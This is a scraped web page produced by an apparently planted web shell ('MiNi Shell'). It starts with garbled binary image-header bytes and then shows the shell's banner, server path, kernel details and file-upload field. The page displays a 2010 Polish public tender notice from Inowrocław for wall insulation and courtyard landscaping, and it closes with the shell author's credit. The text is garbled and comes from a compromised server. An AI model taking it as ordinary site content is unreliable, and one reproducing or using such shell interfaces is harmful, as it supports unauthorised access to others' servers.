JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/331872-N-2010.html

<p class="kh_header"><b>Inowrocław: Wykonanie ocieplenia ścian z kolorystyką  elewacji oraz zagospodarowanie podwórza kamienicy przy ul. Kasztelańskiej 22 w Inowrocławiu</b><br>
<b>Numer ogłoszenia: 331872 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Inowrocław , ul. F. D. Roosevelta 36, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3555250, faks 52 3555233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inowroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie ocieplenia ścian z kolorystyką  elewacji oraz zagospodarowanie podwórza kamienicy przy ul. Kasztelańskiej 22 w Inowrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie ocieplenia ścian podwórzowych z kolorystyką elewacji oraz zagospodarowanie podwórza kamienicy przy ul. Kasztelańskiej 22 w Inowrocławiu, zgodnie z projektami budowlanymi. 
Budynek kamienicy w zabudowie zwartej miejskiej o wymiarach 37,7 x 24,2 m, kubaturze 4946,13 m3, czterokondygnacyjny (łącznik pięciokondygnacyjny), częściowo podpiwniczony  został zbudowany pod koniec XIX wieku.  Całość obiektu wraz sąsiadującymi budynkami tworzy wewnętrzny układ podwórza zabudowanego wewnętrznego typu miejskiego tzw. studni, ograniczonej pierwotnie murem z cegły.

W zakres prac związanych z ociepleniem ścian podwórzowych wchodzą:
- prace przygotowawcze,
- rozbiórka ceglanych wypustów na ścianach budynku,
- prace przygotowawcze do ocieplenia ścian z uzupełnieniem miejscowych braków i wyrównaniem podłoża ścian pod styropian i wełnę mineralną,
- wykonanie renowacji stropu w części dot. Wejścia,
- mocowanie styropianu do ścian przy pomocy zaprawy klejowej i łączników mechanicznych,
- wykonanie nowych obróbek blacharskich z blachy stalowej powlekanej,
- wykonanie obróbek blacharskich oraz montaż podokienników,
- wykonanie warstwy zbrojonej,
- wykonanie wyprawy zewnętrznej,
- wykonanie opaski wokół budynku, elementem końcowym jest tynk mozaikowy,
- zakończenie prac, uporządkowanie terenu.

W zakres prac związanych z zagospodarowaniem podwórza wchodzą:

- rozebranie: istniejących zabudowań na podwórzu - szopa i schowek magazynowy (wraz z fundamentem), pozostałego muru ceglanego z siatką ogrodzeniową (wraz z fundamentem),  podłoża z betonu, gruzu, cegieł i śmieci po pracach budowlanych na terenie podwórza,
-  przygotowanie i wykorygowanie podłoża pod nawierzchnię utwardzoną oraz teren zieleni,
-  wywiezienie gruzu i uporządkowanie terenu po pracach budowlanych, 
-  wykonanie ogrodzenia murowanego z trelażem  drewnianym, 
- wykonanie ozdobnego murku z zadaszeniem na fragmencie ściany budynku sąsiada z termoizolacją,
 - wykonanie opaski ozdobnej z glazury klinkierowej wejścia do budynku z korytarza, montaż ozdobnej kraty - bramy wejściowej do posesji wewnętrznej,
- wykonanie zadaszonego śmietnika, częściowo murowanego, usytuowanego w narożniku działki,
- przygotowanie podłoża pod posadzkę  utwardzoną i montaż krawężników  kamiennych,
- ułożenie nawierzchni typu typ starobruk, kolor melanż popiel-brąz, układ nieregularny, na podłożu piaskowo-betonowym,
- ułożenie nawierzchni z kamienia narzutowego, nieregularnego, na podsypce piaskowo-cementowej,
- wykonanie podłoża pod trawnik z  włókniną z tworzywa dla umocnienia podłoża, nawiezienie ziemią urodzajną, 
- wykonanie nasadzeń w wyznaczonych miejscach zielenią stałą - iglaki  średnie, niskie i płożące oraz zieleń uzupełniająca - bluszcze, paprotki i pnącza, 
 -  wykonanie  trawnika na przygotowanym gruncie z trawy odpornej na chodzenie z utwardzeniem,
-  montaż ławek, śmietnika, 
-  wykonanie i montaż  opraw  elektrycznych.
          
Zamawiający wymaga, aby wykonawca udzielił na przedmiot zamówienia  3-letniej rękojmi za wady i 3-letniej gwarancji jakości, licząc od dnia odbioru przedmiotu umowy  bez zastrzeżeń.

Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót, załączone do niniejszej siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.41.00.00-4, 45.44.30.00-4, 45.31.00.00-3, 45.43.21.12-2, 45.26.25.22-6, 03.12.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali  co najmniej dwie roboty budowlane  w zakres których wchodziło ocieplenie budynku, kolorystyka elewacji o wartości min. 150 000 zł.  Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych robót budowlanych oraz dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnianie warunku zostanie ocenione na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują  osobą/osobami posiadającymi uprawnienia budowlane w specjalności konstrukcyjno-budowlanej. Spełnianie warunku zostanie ocenione na podstawie złożonego wykazu osób uczestniczących w wykonywaniu zamówienia oraz oświadczenia, ze wymienione osoby posiadają wymagane uprawnienia budowlane;  na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają środki finansowe (lub zdolność kredytową) w wysokości co najmniej 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy zł). Spełnianie warunku zostanie ocenione na podstawie złożonej informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy;  na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	kosztorys ofertowy, w którym należy dodatkowo podać nazwę oferowanego systemu ocieplenia ścian budynku, wysokość czynników produkcji (rbg, M - ceny jednostkowe podstawowych materiałów, S - ceny jednostkowe podstawowego sprzętu, Ko, Z ),
2)	harmonogram rzeczowo-finansowy opracowany na podstawie tabeli elementów scalonych zawierającej poszczególne elementy technologiczne wykonania robót, uwzględniający warunki finansowania inwestycji, umożliwiającego fakturowanie i odbiory robót;
3)	zobowiązanie wykonawcy w sprawie sposobu utylizacji lub przekazania do utylizacji materiałów pochodzących z rozbiórki wraz ze wskazaniem miejsca i sposobu utylizacji albo innego wykorzystania tych materiałów.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - Termin wykonania - 5.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6.	Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli wystąpią następujące okoliczności:
1)	zmiana terminu wykonania zamówienia - Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia  Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a)	przekazania terenu budowy,
b)	przekazania dokumentacji budowy, do przekazania których zamawiający był zobowiązany,
c)	zapewnienia  możliwości  poboru wody i energii elektrycznej na potrzeby budowy,
d)	zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
e)	zmiany terminu dokonania odbiorów przewidzianych w umowie.
f)	  zawieszenia robót przez Zamawiającego,
g)	wykopalisk uniemożliwiających wykonanie robót,
h)	szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
i)	siły wyższej, klęski żywiołowej
j)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkód, za które wykonawca nie ponosi odpowiedzialności,
k)	niewypałów i niewybuchów,
l)	wykopalisk archeologicznych nieprzewidywanych w siwz,
m)	odmiennych od przyjętych w dokumentacji projektowej warunków  geologicznych (kategorie gruntu, kurzawka  itp.),
n)	odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności  istnienie  podziemnych urządzeń, instalacji lub obiektów  infrastrukturalnych.
o)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
p)	odmowa wydania przez organy administracji wymaganych  decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
2)	jeżeli powstały konieczne zmiany  technologiczne, w szczególności:
a)	konieczności zrealizowania  projektu  przy  zastosowaniu innych  rozwiązań  technicznych/technologicznych  niż wskazane w dokumentacji  projektowej w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem  lub wadliwym  wykonaniem  projektu,
b)	odmienne od przyjętych w dokumentacji  projektowej  warunki  geologiczne   (kategorie gruntu, kurzawa itp.) skutkujące  niemożliwością  zrealizowania przedmiotu umowy  przy dotychczasowych założeniach  technologicznych,
c)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych  urządzeń instalacji  lub  obiektów infrastrukturalnych,     
d)	konieczności zrealizowania projektu przy  zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
      pozostałe zmiany: 
a)	zmiana warunków finansowania zamówienia,
b)	jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 
c)	jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
d)	 rezygnacja  przez  zamawiającego z realizacji części   przedmiotu  umowy - w takim przypadku  wynagrodzenie  przysługuje  wykonawcy  zostanie  pomniejszone, przy  czym  Zamawiający  zapłaci za  wszystkie  spełnione  świadczenia  oraz udokumentowane  koszty,  które  wykonawca  poniósł w związku z wynikającymi z umowy  planowaniami  świadczeniami,
e)	kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone z zachowaniem  zasady opisanej w siwz i ofercie wykonawcy.
4. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia; przyjmuje się następujące zasady wyceny robót  dodatkowych (lub zamiennych): rozliczenie na podstawie kosztorysów przygotowanych przez Wykonawcę, a zatwierdzonych przez inspektora nadzoru i Zamawiającego. Kosztorysy te opracowane będą w oparciu o następujące założenia: ceny czynników produkcji (rbg, M, S, Ko, Z) zostaną przyjęte z kosztorysu   ofertowego złożonego przez wykonawcę. Podstawą do określenia nakładów rzeczowych będą normy zawarte w kosztorysach ofertowych, a przypadku ich braku - odpowiednie pozycje KNR. W przypadku braku odpowiednich pozycji w KNR zastosowane zostaną pozycje KNNR, a następnie wycena indywidualna wykonawcy, zatwierdzona przez Zamawiającego,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
5. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. inspektor nadzoru oraz kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Inowrocławia, 88-100 Inowrocław, ul. Roosevelta 36, Zespół zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2010 godzina 10:00, miejsce: Urząd Miasta Inowrocławia, 88-100 Inowrocław, ul. Roosevelta 36, punkt informacyjno-podawczy Biura Obsługi Interesantów i Kontroli.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie finansowane ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com